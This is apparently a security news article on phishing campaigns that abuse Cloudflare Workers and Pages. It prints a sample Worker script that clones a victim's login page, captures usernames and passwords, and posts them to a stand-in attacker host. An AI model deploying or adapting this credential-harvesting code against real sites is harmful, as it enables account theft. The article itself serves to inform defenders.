Cybersecurity experts have identified a troubling new trend where threat actors are exploiting legitimate Cloudflare services to orchestrate highly convincing phishing campaigns.
The attacks, which began emerging in early 2025, leverage Cloudflare Workers and Pages to host malicious content that easily bypasses traditional security filters due to the trusted nature of Cloudflare’s infrastructure.
These sophisticated campaigns primarily target financial institutions and technology companies, with victims reporting credential theft and subsequent unauthorized access to sensitive systems.
The attack chain begins when victims receive seemingly legitimate emails containing links to what appear to be authentic login portals.
Rather than directing users to obviously suspicious domains, these links point to Cloudflare-hosted resources with authentic SSL certificates, lending credibility to the fraudulent sites.
The attackers further enhance the deception by implementing precise replicas of legitimate login interfaces, complete with corporate branding and expected functionality that creates a seamless illusion of authenticity.
.webp)
Hunt.io security researchers identified this campaign after observing a 43% increase in phishing incidents utilizing trusted cloud infrastructure over the past quarter.
Their analysis revealed that these attacks are likely conducted by an organized threat group with advanced capabilities and knowledge of cloud service configurations.
“What makes these attacks particularly effective is their abuse of implicit trust in Cloudflare’s infrastructure,” noted Lead Researcher Sarah Chen at Hunt.io.
The widespread adoption of Cloudflare across legitimate business websites creates a perfect environment for these attacks to flourish.
Traditional security solutions often whitelist Cloudflare resources, allowing malicious content to slip through defenses.
Organizations affected by these campaigns have reported significant data breaches resulting from the stolen credentials, with recovery costs estimated to exceed $2.3 million per incident.
Attack Infrastructure
The attackers deploy sophisticated JavaScript code within Cloudflare Workers that dynamically generates phishing pages tailored to each victim.
The malicious script intercepts credentials and exfiltrates them to attacker-controlled servers while providing convincing success responses to victims.
A simplified version of the malicious code appears below:-
addEventListener('fetch', event => {
event.respondWith(handleRequest(event. Request))
})
async function handleRequest(request) {
// Clone authentic login page from legitimate site
const legitimateSite = await fetch('https://victim-company.com/login')
let response = new Response(await legitimateSite.text(), legitimateSite)
// Inject credential-stealing code
response = new Response(
response.body.replace('', `
document.querySelector('form').onsubmit = function(e) {
e.preventDefault();
const creds = {
username: document.getElementById('username').value,
password: document.getElementById('password').value
};
fetch('https://attacker-c2.com/collect', {
method: 'POST',
body: JSON.stringify(creds)
}).then(() => {
window.location = 'https://victim-company.com/dashboard';
});
}
`)
)
return response;
}This technique allows attackers to maintain persistence while evading detection, as the phishing infrastructure leverages Cloudflare’s legitimate reputation and robust infrastructure to remain operational.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
